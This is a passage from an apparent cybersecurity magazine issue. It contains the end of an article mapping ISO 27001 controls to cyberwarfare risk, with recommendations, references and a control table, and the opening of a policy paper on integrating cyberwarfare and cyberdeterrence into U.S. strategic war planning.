Of the 133 controls defined in Annex A of the ISO 27001 standard, not all are required to reduce the risk of cyberattacks and cyberwarfare. However, using my knowledge of the ISO 27001 standard framework of 133 controls, and my knowledge of the various characteristics and aspects of cyberattacks and cyberwarfare, I created the table in Appendix A that can be used to understand how these various defined controls can be used to mitigate the risks associated with cyberattacks and cyberwarfare. The right-most column gives a simple yes or no to indicate the usefulness of the control in the mitigation of risks associated with cyberattacks and cyberwarfare.
Figure 8. Mapping ISO 27001 Annex A controls to NIST 800-53 Controls (FISMA)
Recommendations
This section has been divided into recommendations for four distinct groups of people that will probably comprise the population of this magazine’s readers. I deliberately omitted government officials and military officials because they have their own elite teams of cyberwarfare experts to advise them on these issues. In addition, they have a perspective of cyberattacks and cyberwarfare in which they must consider battle plans and strategies that include both offensive and defensive operations. To best understand the true nature of cyberdeterrence and cyberwarfare, everyone would be well advised to read many of the materials in the reference section of this article, and in particular, read Martin Libicki’s book, Cyberdeterrence and Cyberwar, because I consider it to be the best unclassified reference on the market.
For IT Professionals
• Educate yourself continually about cyberwarfare.
• Stay abreast of the threats and vulnerabilities associated with your infrastructure and the information technologies that you work with.
• Stay abreast of the security controls required to mitigate the risks associated with the information technologies that you work with.
• Where possible, get professional training and certifications associated with IT security and your job positions.
For IT Managers
1. Learn the security compliance standard or standards that will enable you to help your organization effectively lower risk to acceptable levels.
2. Learn risk management in the IT world.
3. Learn what your teams do and keep them motivated to be the best at what they do.
For Executives and Business Owners
• Remember your responsibilities to the Board of Directors, your shareholders and other stakeholders in your organization: cyberattacks and cyberwarfare represent serious threats that can obliterate an organization’s ability to function (see the 2007 cyberattacks in Estonia, or the 2008 attacks in Georgia, if you require more proof). If you plan for your organization to be a going concern for the foreseeable future, you have no alternative but to ensure it is protected from cyberattacks and the effects of cyberwarfare.
• Learn the security compliance standard or standards that will enable you to help your organization effectively lower risk to acceptable levels.
• Learn risk management in the IT world.
• Learn what your managers and your teams do and keep them motivated to be the best at what they do.
For Hackers
• Consider becoming legitimate, because the need for experienced cybersecurity professionals to defend organizations and countries has never been greater and, in the long run, the compensation will probably be much more lucrative.
• Make sure that if you do join a team, it is a winning team.
Conclusions
This article has covered some of the better known aspects of cyberattacks and cyberwarfare, and attempted to show that risks can be managed by applying security compliance frameworks such as ISO 27001. While this has only been an introduction, because scores of books have been written on these topics since 2005, it is important to understand these basic concepts and take them seriously. The future of your business, and the satisfaction and confidence of your stakeholders, business partners, and customers, all depend on your ability to protect your business and its operational capabilities in this day and age of cyberattacks and cyberwarfare.
Resources
• Bousquet, A. (2009). The Scientific Way of Warfare: Order and Chaos on the Battlefields of Modernity. New York, NY: Columbia University Press.
• Brewer, D. and Nash, M. (2010). Insights into the ISO/IEC 27001 Annex A. A paper published by Dr. David Brewer and Dr. Michael Nash to explain ISO 27001 and risk reduction in organizations. Retrieved from http://www.gammassl.co.uk/research/27001annexAinsights.pdf on March 10, 2011.
• Bush, G. W. (2008). Comprehensive National Cybersecurity Initiative (CNCI). Published by the White House, January 2008. Retrieved from http://www.whitehouse.gov/cybersecurity/comprehensive-national-cybersecurity-initiative on January 5, 2012.
• Calder, A. and Watkins, S. (2012). IT Governance: An International Guide to Data Security and ISO27001/ISO27002, 5th edition. London, U.K.: IT Governance Press.
• Carr, J. (2012). Inside Cyber Warfare, second edition. Sebastopol, CA: O’Reilly.
• Clarke, R. A. and Knake, R. K. (2010). Cyberwar: The Next Threat to National Security and What to Do About It. New York, NY: HarperCollins Publishers.
• Crosston, M. (2011). World Gone Cyber MAD: How “Mutually Assured Debilitation” Is the Best Hope for Cyber Deterrence. An article published in Strategic Studies Quarterly, Spring 2011. Retrieved from http://www.au.af.mil/au/ssq/2011/spring/crosston.pdf on October 10, 2012.
• Czosseck, C. and Geers, K. (2009). The Virtual Battlefield: Perspectives on Cyber Warfare. Washington, DC: IOS Press.
• Edwards, M. and Stauffer, T. (2008). Control System Security Assessments. A technical paper presented at the 2008 Automation Summit – A Users Conference, Chicago. Retrieved from http://www.infracritical.com/papers/nstb-2481.pdf on December 20, 2011.
• Fayutkin, D. (2012). The American and Russian Approaches to Cyber Challenges. Defence Force Officer, Israel. Retrieved from http://omicsgroup.org/journals/2167-0374/2167-0374-2-110.pdf on September 30, 2012.
• Freedman, L. (2003). The Evolution of Nuclear Strategy. New York, NY: Palgrave Macmillan.
• Gerwitz, D. (2011). The Obama Cyberdoctrine: Tweet Softly, but Carry a Big Stick. An article published at ZDNet.com on May 17, 2011. Retrieved from http://www.zdnet.com/blog/government/the-obama-cyberdoctrine-tweet-softly-but-carry-a-big-stick/10400 on September 25, 2012.
• Gjelten, T. (2010). Are ‘Stuxnet’ Worm Attacks Cyberwarfare? An article published at NPR.org on October 1, 2011. Retrieved from http://www.npr.org/2011/09/26/140789306/security-expert-u-s-leading-force-behind-stuxnet on December 20, 2011.
• Gjelten, T. (2010). Stuxnet Computer Worm Has Vast Repercussions. An article published at NPR.org on October 1, 2011. Retrieved from http://www.npr.org/templates/story/story.php?storyId=130260413 on December 20, 2011.
• Gjelten, T. (2011). Security Expert: U.S. ‘Leading Force’ Behind Stuxnet. An article published at NPR.org on September 26, 2011. Retrieved from http://www.npr.org/2011/09/26/140789306/security-expert-u-s-leading-force-behind-stuxnet on December 20, 2011.
• Gjelten, T. (2011). Stuxnet Raises ‘Blowback’ Risk in Cyberwar. An article published at NPR.org on December 11, 2011. Retrieved from http://www.npr.org/2011/11/02/141908180/stuxnet-raises-blowback-risk-in-cyberwar on December 20, 2011.
• Goldman, D. (2013). Nations Prepare for Cyber War. An article published at CNN on January 7, 2013. Retrieved from http://money.cnn.com/2013/01/07/technology/security/cyber-war/index.html?hpt=hp_c3 on January 7, 2013.
• Hagestad, W. T. (2012). 21st Century Chinese Cyberwarfare. Cambridgeshire, U.K.: IT Governance.
• Hyacinthe, B. P. (2009). Cyber Warriors at War: U.S. National Security Secrets & Fears Revealed. Bloomington, IN: Xlibris Corporation.
• ISO. (2005). “Information technology – Security techniques – Information security management systems – Requirements”, ISO/IEC 27001:2005. Retrieved from http://www.ansi.org on February 1, 2011.
• Jaquith, A. (2007). Security Metrics. Boston, MA: Addison Wesley.
• Kaplan, F. (1983). The Wizards of Armageddon: The Untold Story of a Small Group of Men Who Have Devised the Plans and Shaped the Policies on How to Use the Bomb. Stanford, CA: Stanford University Press.
• Kerr, D. (2012). Senator Urges Obama to Issue ‘Cybersecurity’ Executive Order. An article published at CNET.com on September 24, 2012. Retrieved from http://news.cnet.com/8301-1009_3-57519484-83/senator-urges-obama-to-issue-cybersecurity-executive-order/ on September 26, 2012.
• Kramer, F. D. (ed.), et al. (2009). Cyberpower and National Security. Washington, DC: National Defense University.
• Langner, R. (2010). A Detailed Analysis of the Stuxnet Worm. Retrieved from http://www.langner.com/en/blog/page/6/ on December 20, 2011.
• Libicki, M. C. (2009). Cyberdeterrence and Cyberwar. Santa Monica, CA: RAND Corporation.
• Markoff, J. and Kramer, A. E. (2009). U.S. and Russia Differ on a Treaty for Cyberspace. An article published in the New York Times on June 28, 2009. Retrieved from http://www.nytimes.com/2009/06/28/world/28cyber.html?pagewanted=all on June 28, 2009.
• Mayday, M. (2012). Iran Attacks US Banks in Cyber War: Attacks Target Three Major Banks, Using Muslim Outrage as Cover. An article published on September 22, 2012 at Politix.Topix.com. Retrieved from http://politix.topix.com/homepage/2214-iran-attacks-us-banks-in-cyber-war on September 22, 2012.
• McBrie, J. M. (2007). The Bush Doctrine: Shifting Position and Closing the Stance. A scholarly paper published by the USAWC Strategy Research Project. Retrieved from http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA423774 on September 30, 2012.
• Obama, B. H. (2012). Defense Strategic Guidance 2012 – Sustaining Global Leadership: Priorities for 21st Century Defense. Published January 3, 2012. Retrieved from http://www.defense.gov/news/Defense_Strategic_Guidance.pdf on January 5, 2012.
• Obama, B. H. (2011). International Strategy for Cyberspace. Published by the White House on May 16, 2011. Retrieved from http://www.whitehouse.gov/sites/default/files/rss_viewer/international_strategy_for_cyberspace.pdf on May 16, 2011.
• Payne, K. B. (2001). The Fallacies of Cold War Deterrence and a New Direction. Lexington, KY: The University of Kentucky Press.
• Pry, P. V. (1999). War Scare: Russia and America on the Nuclear Brink. Westport, CT: Praeger Publications.
• Radcliff, D. (2012). Cyber Cold War: Espionage and Warfare. An article published in SC Magazine, September 4, 2012. Retrieved from http://www.scmagazine.com/cyber-cold-war-espionage-and-warfare/article/254627/ on September 7, 2012.
• Saini, M. (2012). Preparing for Cyberwar – A National Perspective. An article published on July 26, 2012 at the Vivekananda International Foundation. Retrieved from http://www.vifindia.org/article/2012/july/26/preparing-for-cyberwar-a-national-perspective on October 14, 2012.
• Sanger, D. E. (2012). Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power. New York, NY: Crown Publishers.
• Schmidt, H. S. (2006). Patrolling Cyberspace: Lessons Learned from a Lifetime in Data Security. N. Potomac, MD: Larstan Publishing, Inc.
• Schmitt, E. and Shanker, T. (2011). U.S. Debated Cyberwarfare in Attack Plan on Libya. An article published in the New York Times on October 17, 2011. Retrieved from http://www.nytimes.com/2011/10/18/world/africa/cyber-warfare-against-libya-was-debated-by-us.html on October 17, 2011.
• Slater, W. F. (2013). ISO 27001 Resource Page. Retrieved from http://billslater.com/iso27001 on January 12, 2013.
• Stiennon, R. (2010). Surviving Cyber War. Lanham, MD: Government Institutes.
• Strohm, C. and Engleman, E. (2012). Cyber Attacks on U.S. Banks Expose Vulnerabilities. An article published at BusinessWeek.com on September 28, 2012. Retrieved from http://www.businessweek.com/news/2012-09-27/cyber-attacks-on-u-dot-s-dot-banks-expose-computer-vulnerability on September 30, 2012.
• Technolytics. (2012). Cyber Commander’s eHandbook: The Weaponry and Strategies of Digital Conflict, third edition. Purchased and downloaded on September 26, 2012.
• The ISO 27000 Directory. (2012). An Introduction to ISO 27001, ISO 27002 ... ISO 27008. Retrieved from http://www.27000.org/index.htm and http://idcontent.bellevue.edu/content/CIT/cyber/615/compliance on December 7, 2012.
• Turzanski, E. and Husick, L. (2012). “Why Cyber Pearl Harbor Won’t Be Like Pearl Harbor At All...” A webinar presentation held by the Foreign Policy Research Institute (FPRI) on October 24, 2012. Retrieved from http://www.fpri.org/multimedia/2012/20121024.webinar.cyberwar.html on October 25, 2012.
• U.S. Army. (1997). Toward Deterrence in the Cyber Dimension: A Report to the President’s Commission on Critical Infrastructure Protection. Retrieved from http://www.carlisle.army.mil/DIME/documents/173_PCCIPDeterrenceCyberDimension_97.pdf on November 3, 2012.
• U.S. Department of Defense, JCS. (2006). Joint Publication (JP) 5-0, Joint Operation Planning, updated on December 26, 2012. Retrieved from http://www.dtic.mil/doctrine/new_pubs/jp5_0.pdf on October 25, 2012.
• Waters, G. (2008). Australia and Cyber-Warfare. Canberra, Australia: ANU E Press.
WILLIAM F. SLATER, III
William F. Slater, III is an IT security professional who lives and works in Chicago, IL. He has over 20 security-related certifications, including CISSP, SSCP, and CISA. In March 2013 he completes his M.S. in Cybersecurity program at Bellevue University in Bellevue, Nebraska. He has written numerous articles on IT Security and Cyberwarfare. Mr. Slater is also an adjunct professor at the Illinois Institute of Technology and the devoted husband of Ms. Joanna Roguska, who is a web developer and a native of Warsaw, Poland. You can read more about Mr. Slater at http://billslater.com/interview.
Appendix A – ISO 27001 Domains, Control Objectives and Controls
ISO 27001:2005 Controls. Each line gives the clause, the control objective or control, and whether it applies to defending against cyberattacks and cyberwarfare (Yes/No).

Security Policy
5.1 Information Security Policy
5.1.1 Information Security Policy Document – Yes
5.1.2 Review of Information Security Policy – No

Organization of Information Security
6.1 Internal Organization
6.1.1 Management Commitment to Information Security – Yes
6.1.2 Information Security Co-ordination – No
6.1.3 Allocation of Information Security Responsibilities – Yes
6.1.4 Authorization Process for Information Processing Facilities – No
6.1.5 Confidentiality Agreements – No
6.1.6 Contact with Authorities – No
6.1.7 Contact with Special Interest Groups – No
6.1.8 Independent Review of Information Security – No
6.2 External Parties
6.2.1 Identification of Risks Related to External Parties – No
6.2.2 Addressing Security When Dealing with Customers – No
6.2.3 Addressing Security in Third Party Agreements – No

Asset Management
7.1 Responsibility for Assets
7.1.1 Inventory of Assets – Yes
7.1.2 Ownership of Assets – Yes
7.1.3 Acceptable Use of Assets – Yes
7.2 Information Classification
7.2.1 Classification Guidelines – Yes
7.2.2 Information Labeling and Handling – Yes

Human Resource Security
8.1 Prior to Employment
8.1.1 Roles and Responsibilities – Yes
8.1.2 Screening – Yes
8.1.3 Terms and Conditions of Employment – No
8.2 During Employment
8.2.1 Management Responsibility – Yes
8.2.2 Information Security Awareness, Education and Training – Yes
8.2.3 Disciplinary Process – No
8.3 Termination or Change of Employment
8.3.1 Termination Responsibility – No
8.3.2 Return of Assets – Yes
8.3.3 Removal of Access Rights – Yes

Physical and Environmental Security
9.1 Secure Areas
9.1.1 Physical Security Perimeter – Yes
9.1.2 Physical Entry Controls – Yes
9.1.3 Securing Offices, Rooms and Facilities – Yes
9.1.4 Protecting Against External and Environmental Threats – Yes
9.1.5 Working in Secure Areas – Yes
9.1.6 Public Access, Delivery and Loading Areas – Yes
9.2 Equipment Security
9.2.1 Equipment Siting and Protection – Yes
9.2.2 Support Utilities – Yes
9.2.3 Cabling Security – No
9.2.4 Equipment Maintenance – No
9.2.5 Security of Equipment Off-Premises – Yes
9.2.6 Secure Disposal or Reuse of Equipment – Yes
9.2.7 Removal of Property – Yes

Communications and Operations Management
10.1 Operational Procedures and Responsibilities
10.1.1 Documented Operating Procedures – Yes
10.1.2 Change Management – Yes
10.1.3 Segregation of Duties – Yes
10.1.4 Separation of Development and Operations Facilities – Yes
10.2 Third Party Service Delivery Management
10.2.1 Service Delivery – No
10.2.2 Monitoring and Review of Third Party Services – No
10.2.3 Managing Changes to Third Party Services – No
10.3 System Planning and Acceptance
10.3.1 Capacity Management – Yes
10.3.2 System Acceptance – Yes
10.4 Protection Against Malicious and Mobile Code
10.4.1 Controls Against Malicious Code – Yes
10.4.2 Controls Against Mobile Code – Yes
10.5 Back-Up
10.5.1 Information Backup – Yes
10.6 Network Security Management
10.6.1 Network Controls – Yes
10.6.2 Security of Network Services – Yes
10.7 Media Handling
10.7.1 Management of Removable Media – Yes
10.7.2 Disposal of Media – Yes
10.7.3 Information Handling Procedures – Yes
10.7.4 Security of System Documentation – Yes
10.8 Exchange of Information
10.8.1 Information Exchange Policies and Procedures – Yes
10.8.2 Exchange Agreements – Yes
10.8.3 Physical Media in Transit – Yes
10.8.4 Electronic Messaging – Yes
10.8.5 Business Information Systems – Yes
10.9 Electronic Commerce Services
10.9.1 Electronic Commerce – Yes
10.9.2 On-Line Transactions – Yes
10.9.3 Publicly Available Information – Yes
10.10 Monitoring
10.10.1 Audit Logging – Yes
10.10.2 Monitoring System Use – Yes
10.10.3 Protection of Log Information – Yes
10.10.4 Administrator and Operator Logs – Yes
10.10.5 Fault Logging – Yes
10.10.6 Clock Synchronization – Yes

12.4.3 Access Control to Program Source Library – Yes
12.5 Security in Development and Support Processes
12.5.1 Change Control Procedures – Yes
12.5.2 Technical Review of Applications After Operating System Changes – Yes
12.5.3 Restrictions on Changes to Software Packages – Yes
12.5.4 Information Leakage – Yes
12.5.5 Outsourced Software Development – Yes
12.6 Technical Vulnerability Management
12.6.1 Control of Technical Vulnerabilities – Yes

Information Security Incident Management
13.1 Reporting Information Security Events and Weaknesses
13.1.1 Reporting Information Security Events – Yes
13.1.2 Reporting Security Weaknesses – Yes
13.2 Management of Information Security Incidents and Improvements
13.2.1 Responsibilities and Procedures – Yes
13.2.2 Learning from Information Security Incidents – Yes
13.2.3 Collection of Evidence – Yes

Business Continuity Management
14.1 Information Security Aspects of Business Continuity Management
14.1.1 Including Information Security in the Business Continuity Management Process – Yes
14.1.2 Business Continuity and Risk Assessment – Yes
14.1.3 Developing and Implementing Continuity Plans Including Information Security – Yes
14.1.4 Business Continuity Planning Framework – Yes
14.1.5 Testing, Maintaining and Re-assessing Business Continuity Plans – Yes

Compliance
15.1 Compliance with Legal Requirements
15.1.1 Identification of Applicable Legislation – Yes
15.1.2 Intellectual Property Rights (IPR) – Yes
15.1.3 Protection of Organizational Records – Yes
15.1.4 Data Protection and Privacy of Personal Information – Yes
15.1.5 Prevention of Misuse of Information Processing Facilities – Yes
15.1.6 Regulation of Cryptographic Controls – Yes
15.2 Compliance with Security Policies and Standards and Technical Compliance
15.2.1 Compliance with Security Policy – Yes
15.2.2 Technical Compliance Checking – Yes
15.3 Information System Audit Considerations
15.3.1 Information System Audit Controls – Yes
15.3.2 Protection of Information System Audit Tools – Yes
WAR CAMP
46 http://pentestmag.com Page OPEN 05/2013
Integration of Cyberwarfare and Cyberdeterrence Strategies into the U.S. CONOPS Plan to Maximize Responsible Control and Effectiveness by the U.S. National Command Authorities

This paper deals with issues related to the present situation of lack of a clearly defined national policy on the use of cyberweapons and cyberdeterrence, as well as the urgent present need to include strategies and tactics for cyberwarfare and cyberdeterrence into the national CONOPS Plan, which is the national strategic war plan for the United States.

One of the main disadvantages of the hyper-connected world of the 21st century is the very real danger faced by countries, organizations, and people who use networked computer resources connected to the Internet: they are at risk of cyberattacks that could result in one or more cyber threat dangers such as denial of service, espionage, theft of confidential data, destruction of data, and/or destruction of systems and services. As a result of these cyber threats, the national leaders and military of most modern countries have now recognized that the potential for cyberattacks and cyberwar is very real, and many are hoping to counter these threats with modern technological tools, using strategies and tactics under a framework of cyberdeterrence with which they can deter the potential attacks associated with cyberwarfare.

Nature of the Threat
During my studies prior to and as a student in this DET 630 – Cyberwarfare and Cyberdeterrence course at Bellevue University, it occurred to me that considering the rapid evolution of the potentially destructive capabilities of cyberweapons and the complex nature of cyberdeterrence in the 21st century, it is now a critical priority to integrate the cyberwarfare and cyberdeterrence plans into the CONOPS plan. Indeed, if the strategic battleground of the 21st century has now expanded to include cyberspace, and the U.S. has in the last five years ramped up major military commands, training, personnel, and capabilities to support cyberwarfare and cyberdeterrence capabilities, the inclusion of these capabilities should now be a critical priority of the Obama administration if it has not already happened.

How large a problem is this for the United States?
Without the integration of cyberwarfare and cyberdeterrence technologies, strategies, and tactics into the CONOPS Plan, the national command authorities run a grave risk of conducting a poorly planned offensive cyberwarfare operation that could precipitate a global crisis, impair relationships with its allies, and potentially unleash a whole host of unintended negative and potentially catastrophic consequences. In non-military terms, at least four notable cyberspace events caused widespread damage via the Internet because of the rapid speed of their propagation and their apparently ruthless and indiscriminate selection of vulnerable targets. They are 1) the Robert Morris worm (U.S. origin, 1988); 2) the ILOVEYOU worm (Philippines origin, 2000); 3) the Code Red worm (U.S. origin, 2001); and 4) the SQL Slammer worm (U.S. origin, 2003). If not executed with great care and forethought, a cyberweapon could potentially unleash even greater damage on intended targets, and possibly on unintended targets that were connected via the Internet.
Other Not So Obvious Challenges for Cyberweapons and Cyberdeterrence
The cyberspace threat and vulnerability landscape is notable in that it is continually dynamic and shifting. Those who are responsible for protecting assets in cyberspace have many more challenges on their hands than their military counterparts who utilize weapons like guns, explosives, artillery, missiles, etc. For example, by some estimates over 350 new types of malware are manufactured each month. There are also monthly patch updates to most Microsoft software and operating systems, and phenomena such as evil hackers and zero-day exploits are apparently never ending. Therefore, the inclusion of cyberweapons and cyberdeterrence capabilities in the CONOPS Plan would require more frequent, rigorous, complex, and integrated testing to ensure that it was always effective and up to date. In the dynamic world of cyberspace with its constantly shifting landscape of new capabilities, threats and vulnerabilities, coordinating the constant refresh and testing of a CONOPS Plan that integrated these cyberwarfare and cyberdeterrence capabilities would be no small feat. In addition, constant intelligence gathering and reconnaissance would need to be performed on suspected enemies to ensure that our cyberweapons and cyberdeterrence capabilities would be in a constant state of being able to deliver the intended effects for which they were designed.
Is it a problem for other countries?
The careful planning and integration of cyberweapons and cyberdeterrence is likely a challenge for every country with these capabilities. For example, much is already known about our potential adversaries, such as Russia, China and North Korea, but what is perhaps less understood is the degree to which they have been successful in integrating cyberwarfare and cyberdeterrence capabilities into their own national war plans. Nevertheless, due to the previous extensive experience of Russia and the U.S. with strategic war planning, it is more likely that each of these countries stands the greatest chance of integrating cyberwarfare and cyberdeterrence capabilities into their respective war plans. Yet, as recently as June 2009, it was clear that the U.S. and Russia were unable to agree on a treaty that would create the terms under which cyberwarfare operations could and would be conducted (Markoff and Kramer, 2009).
Is it problematic for these countries in the same ways or is there variation? What kind?
Every country that is modern enough to have organizations, people, and assets that are connected to computers and the Internet faces similar challenges of planning and managing cyberweapons and cyberdeterrence, and the poorer the country, the more significant the challenges. For example, when a small group of hackers from Manila in the Philippines unleashed the ILOVEYOU worm on the Internet in 2000, it caused over $2 billion in damages to computer data throughout the world. Agents from the FBI went to Manila to track down these people and investigate how and why the ILOVEYOU worm catastrophe occurred. To their surprise, they learned that each of the hackers who were involved could successfully escape prosecution because there were no laws in the Philippines with which to prosecute them. So actually most countries lack the technological and legal frameworks with which to successfully build a coordinated effort to manage the weapons and strategies of cyberwarfare and cyberdeterrence, despite the fact that most now embrace cyberspace with all the positive economic benefits it offers for commerce and communications.
What are the consequences to the U.S. and others if this threat is left unchecked?
As stated earlier, without the careful integration of cyberwarfare and cyberdeterrence technologies, strategies, and tactics into the CONOPS Plan, the national command authorities run a grave risk of launching a poorly planned offensive cyberwarfare operation that could precipitate a global crisis, impair relationships with its allies, and potentially unleash a whole host of unintended negative and potentially catastrophic consequences.
What consequences has the threat already produced on American/global society?
The absence of well-defined cyberwarfare and cyberdeterrence strategies and tactics in the CONOPS Plan has already produced some situations that have either damaged America’s image abroad, or that could imperil its image and have far more negative consequences. For example, operations such as Stuxnet, Flame, Duqu, etc., might have either been better planned or possibly not executed at all if cyberwarfare and cyberdeterrence strategies and tactics were defined in the CONOPS Plan. Also, the news media indicated that during the revolution in Libya that resulted in the fall of Qaddafi, cyberwarfare operations were considered by the Obama administration. The negative reactions and repercussions on the world stage might have far outweighed any short term advantages that could have resulted from a successful set of cyberattacks against Libyan infrastructure assets that were attached to computer networks. Again, a comprehensive CONOPS Plan that included well-defined cyberwarfare and cyberdeterrence strategies and tactics could have prevented such possible cyberattacks from even being considered, and it could have prevented the news of the possible consideration being publicized in the press (Schmitt, E. and Shanker, T., 2011). Without such restraint and well-planned, deliberate actions, the U.S. runs the risk of appearing like the well-equipped cyber bully on the world stage, and an adversary who is willing to unleash weapons that can and will do crippling damage to an opponent, using technologies that are rapid, decisive, and not well understood by those for whom they are intended. A similar effect and world reaction might be expected if U.S. Army infantry troops were equipped with laser rifles that emitted deadly laser blasts with pinpoint precision across several hundred yards.
The Rapid Evolution of Cyberthreats
As predicted in the Technolytics chart below, cyberweapons have rapidly evolved over time. Since Stuxnet was released in 2010, countries and the general public are now aware of some of the offensive, strategic and destructive capabilities and potential of cyberweapons (Gelton, T., 2011). The changes that produced Stuxnet and other recent, more modern cyberweapons were a national resolve to excel in the cyberwarfare area, coupled with excellent reconnaissance on desired targets, and partnering with computer scientists in Israel. The political consequences are not well understood yet, except to say that the U.S. and Israel are probably less trusted and suspected of even greater future capabilities, as well as having the will to use them. Again, having well-planned cyberwarfare and cyberdeterrence strategies and tactics defined in the CONOPS Plan might indeed restrain such possibly reckless decisions as to unleash cyberweapon attacks without what the world might consider the correct provocation.
Part 1 Final Thoughts about Cyberwarfare Operations
In the words of Deb Radcliff, in an article published in SC Magazine in September 2012, “we are already in a cyberwar” (Radcliff, D., 2012). But as I was performing my research, it occurred to me that a country like the U.S. might in the future unleash such a devastating cyberattack that it could cripple the enemy’s ability to communicate surrender. I think that the moral implications of such circumstances need to be justly considered as a matter of the laws of war, because if a country continues to attack an enemy that has indicated that they are defeated and want to surrender, this shifts the moral ground from which the U.S. may have believed it was conducting its cyberwarfare operations. This is one other unintended consequence of cyberwarfare and one that needs to be carefully considered.
Figure 1. Evolution of Cyberweapons (Technolytics, 2012)

Part 2 – U.S. Policy Appraisal Related to Cyberwarfare and Cyberdeterrence
This section will examine current U.S. policy related to cyberwarfare and cyberdeterrence.

Current U.S. Policy Covering Cyberwarfare Threats
The current written policy related to cyberwarfare threats can be found in President Obama’s Defense Strategic Guidance 2012, a 16-page policy document that was published on January 3, 2012. The excerpt related specifically to cyberwarfare and cyber threats is shown below:
“To enable economic growth and commerce, America, working in conjunction with allies and partners around the world, will seek to protect freedom of access throughout the global commons – those areas beyond national jurisdiction that constitute the vital connective tissue of the international system. Global security and prosperity are increasingly dependent on the free flow of goods shipped by air or sea. State and non-state actors pose potential threats to access in the global commons, whether through opposition to existing norms or other anti-access approaches. Both state and non-state actors possess the capability and intent to conduct cyber espionage and, potentially, cyber attacks on the United States, with possible severe effects on both our military operations and our homeland. Growth in the number of space-faring nations is also leading to an increasingly congested and contested space environment, threatening safety and security. The United States will continue to lead global efforts with capable allies and partners to assure access to and use of the global commons, both by strengthening international norms of responsible behavior and by maintaining relevant and interoperable military capabilities (Obama, 2012).”
The first explicit Obama Administration policy acknowledging the realities of cyber threats was published in a 30-page document titled International Strategy for Cyberspace in May 2011.
“Today, as nations and peoples harness the networks that are all around us, we have a choice. We can either work together to realize their potential for greater prosperity and security, or we can succumb to narrow interests and undue fears that limit progress. Cybersecurity is not an end unto itself; it is instead an obligation that our governments and societies must take on willingly, to ensure that innovation continues to flourish, drive markets, and improve lives. While offline challenges of crime and aggression have made their way to the digital world, we will confront them consistent with the principles we hold dear: free speech and association, privacy, and the free flow of information.

“The digital world is no longer a lawless frontier, nor the province of a small elite. It is a place where the norms of responsible, just, and peaceful conduct among states and peoples have begun to take hold. It is one of the finest examples of a community self-organizing, as civil society, academia, the private sector, and governments work together democratically to ensure its effective management. Most important of all, this space continues to grow, develop, and promote prosperity, security, and openness as it has since its invention. This is what sets the Internet apart in the international environment, and why it is so important to protect.

“In this spirit, I offer the United States’ International Strategy for Cyberspace. This is not the first time my Administration has addressed the policy challenges surrounding these technologies, but it is the first time that our Nation has laid out an approach that unifies our engagement with international partners on the full range of cyber issues. And so this strategy outlines not only a vision for the future of cyberspace, but an agenda for realizing it. It provides the context for our partners at home and abroad to understand our priorities, and how we can come together to preserve the character of cyberspace and reduce the threats we face (Obama, 2011).”
Though the Obama Administration reviewed and approved President Bush’s CNCI policy in May 2009, Obama, who is regarded as the most technology-savvy president that has ever occupied the White House, went much further to acknowledge the importance of cyberspace to the American economy and the American military, and the importance of defending the U.S. from adversaries that could threaten us via cyberspace. Obama’s policy also acknowledges the reality that future wars will be fought in the realm of cyberspace, and has thus funded the preparation of the U.S. armed forces for conflict in cyberspace (Gerwitz, 2011).
What is the effectiveness of current policy when it concerns this particular threat issue?
The Obama Administration’s policies have been effective in raising the awareness of the U.S. population as to the importance of protecting assets that are connected in cyberspace. These policies have also been effective in providing for the preparation of the U.S. military to deal with conflict in cyberspace. However, the present policy has not been effective as a deterrent to cyber threats presented by potential national enemies and non-state actors. As recently as September 23, 2012 – September 30, 2012, cyber attacks in the form of distributed denial of service (DDoS) attacks from the Middle East against several major U.S. banks have publicly demonstrated the ire of the attackers and also the vulnerabilities of banks with a customer presence in cyberspace (Strohm and Engleman, 2012).
Short-Term and Long-Term Ramifications of Current Policy
In the short term, the Obama Administration’s policies regarding cyberspace have done much to raise the awareness of cyberspace as an area that requires protection for the public good and prosperity of the American people. These policies have also served to show our allies and our potential enemies that the U.S. has the intention of defending cyberspace and all our interests that are connected to it. In the long term, these policies will probably evolve to reveal, in a general, unclassified way, stronger defenses, stronger deterrent capabilities and probably offensive cyberweapons.
On the legislative front, as recently as September 23, 2012, the Chairman of the Senate Homeland Security Committee, Senator Joseph Lieberman (D., Connecticut), realizing that Congress would fail to pass cybersecurity legislation designed to help protect the United States and its people, sent an urgent letter to President Obama to ask for the creation of a new Presidential Executive Order that would address several current cybersecurity issues, including how, when and where law enforcement can become involved in cybersecurity issues (Kerr, 2012). Though many digital privacy rights advocates, including the Electronic Frontier Foundation, the Electronic Privacy Information Center, and the American Civil Liberties Union, have strenuously fought recent cybersecurity legislation, it is expected by many cybersecurity experts that if President Obama is reelected in November 2012, an Executive Order drafted and signed by the Obama Administration would provide the tools that the federal government wants. Even if President Obama is not reelected in November 2012, it is expected that some expedient action on the part of the new president would probably take place even before Congress could successfully agree upon and pass such legislation.
Allies and Adversaries Connected to this Specific Policy?
It is entirely likely that there are classified versions of the International Strategy for Cyberspace policy that address the nature of how U.S. policies regarding the defense of cyberspace will affect our allies and our adversaries. But since it has been publicly revealed that the Obama Administration conducted offensive cyberwarfare operations against Iran between June 2009 and June 2010, it is also likely that both our allies and our enemies have a clearer understanding of U.S. capabilities as well as the intent to use cyberweapons when it deems it is in its best interests to do so.
Part 2 Conclusion
The good news is that President Obama and his Administration apparently have an acute awareness of the importance of cyberspace to the American economy and the American military. The bad news is that because we are already in some form of cyberwarfare that appears to be rapidly escalating, it remains to be seen what effects these cyberattacks and the expected forthcoming Executive Orders that address cybersecurity will have on the American people and our way of life. Nevertheless, it will be necessary to act prudently, carefully balancing our freedoms with our need for security, and also considering the importance of enabling and protecting the prosperity of the now electronically connected, free enterprise economy that makes the U.S. the envy of and the model for the rest of the world.
Part 3 – Strategic Comparative Analysis in Cyberwarfare and Cyberdeterrence
This section will present a strategic comparative analysis of the present state of cyberwarfare and cyberdeterrence issues as they relate to other countries that could be considered adversaries, now or in the not too distant future.

What Other Countries / Regions of the World Are Concerned with This Same Threat Issue?
The countries that are primarily concerned with cyberwarfare and cyberdeterrence threat issues are the same countries that already have the greatest cyberwarfare capabilities and also the most to lose in the event of a full-scale cyberwarfare attack. The diagram below from a 2009 study shows the comparative cyberwar capabilities of the 66 largest countries in the world (Figure 2).
Countries / Regions of the World That Do Not Place a High Priority on This Threat Issue
